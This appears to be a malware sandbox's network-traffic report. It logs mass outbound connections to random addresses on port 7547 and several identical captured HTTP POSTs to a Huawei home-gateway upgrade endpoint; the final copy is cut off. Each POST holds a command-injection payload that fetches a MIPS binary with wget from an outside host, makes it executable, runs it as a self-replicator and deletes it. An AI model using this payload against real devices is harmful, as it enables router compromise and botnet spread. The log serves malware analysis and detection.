      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 87.141.20.197:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 67.202.11.69:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 209.27.221.55:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 171.209.86.222:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 57.7.75.176:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 154.131.28.215:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 212.114.89.146:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 209.12.129.227:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 185.177.118.191:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 44.126.56.28:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 90.66.18.81:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 112.230.182.194:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 186.67.70.121:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 163.203.111.255:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 14.228.142.110:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 189.219.105.161:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 91.165.202.140:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 218.212.250.29:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 101.117.76.66:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 155.119.245.88:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 79.249.168.238:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 184.144.211.213:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 218.81.118.95:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 128.248.215.197:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 175.177.200.154:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 98.187.49.93:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 203.228.213.6:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 208.2.158.171:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 139.35.14.129:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 168.136.141.190:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 166.199.189.237:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 183.152.162.86:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 131.183.25.247:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 163.231.232.208:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 43.193.190.163:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 126.145.201.164:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 43.227.20.87:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 133.45.77.241:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 54.138.119.51:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 42.123.196.81:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 95.198.156.27:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 124.33.119.2:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 173.121.7.50:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 91.16.22.236:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 83.122.19.198:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 223.228.16.239:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 112.152.116.110:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 199.4.180.116:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 146.165.195.231:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 202.238.222.231:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 79.37.65.208:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 58.227.71.85:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 123.90.243.185:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 12.140.146.26:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 120.188.9.130:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 221.167.200.71:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 150.131.50.75:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 187.119.31.9:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 25.245.213.174:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 104.176.122.183:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 85.133.16.229:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 128.72.23.200:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 169.180.232.46:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 27.255.169.69:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 153.112.130.142:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 193.66.35.130:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 148.160.95.164:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 5.40.242.159:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 158.108.34.87:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 191.223.15.38:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 27.114.39.197:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 176.5.168.147:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 112.10.221.157:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 197.86.104.3:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 79.37.135.118:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 168.205.249.96:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 14.246.219.37:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 89.48.254.205:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 50.151.1.21:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 44.191.33.154:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 45.156.86.78:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 89.222.240.248:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 170.6.27.3:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 62.110.206.147:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 181.33.235.236:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 103.198.243.13:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 108.140.205.74:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 153.27.160.64:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 62.171.248.24:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 146.186.69.83:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 84.192.209.35:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 125.245.77.162:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 31.160.190.224:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 32.28.238.154:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 156.93.0.40:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 74.179.33.132:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 131.3.167.142:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 82.4.179.225:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 24.58.137.218:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 82.29.45.61:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 53.155.77.5:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 162.241.153.53:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 130.142.208.194:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 74.198.21.122:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 72.8.58.80:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 91.101.216.102:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 118.81.130.110:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 97.121.204.101:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 120.123.23.99:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 47.223.93.47:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 35.34.235.124:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 8.243.228.99:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 112.136.226.102:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 173.186.159.121:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 4.151.19.148:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 99.80.23.9:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 142.136.120.249:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 198.237.139.131:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 95.242.153.3:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 153.57.37.175:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 125.95.233.22:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 158.176.81.142:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 39.52.219.117:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 67.224.165.91:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 162.178.198.236:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 76.111.73.243:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 122.80.113.13:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 68.139.189.140:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 77.56.110.109:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 72.34.153.160:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 220.12.160.29:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 197.116.91.99:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 1.63.92.231:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 119.41.174.105:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 23.91.103.252:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 177.40.33.238:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 137.55.144.186:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 181.146.254.106:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 155.122.177.98:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 13.107.42.153:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 180.57.120.234:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 181.110.239.122:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 164.161.233.227:7547
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 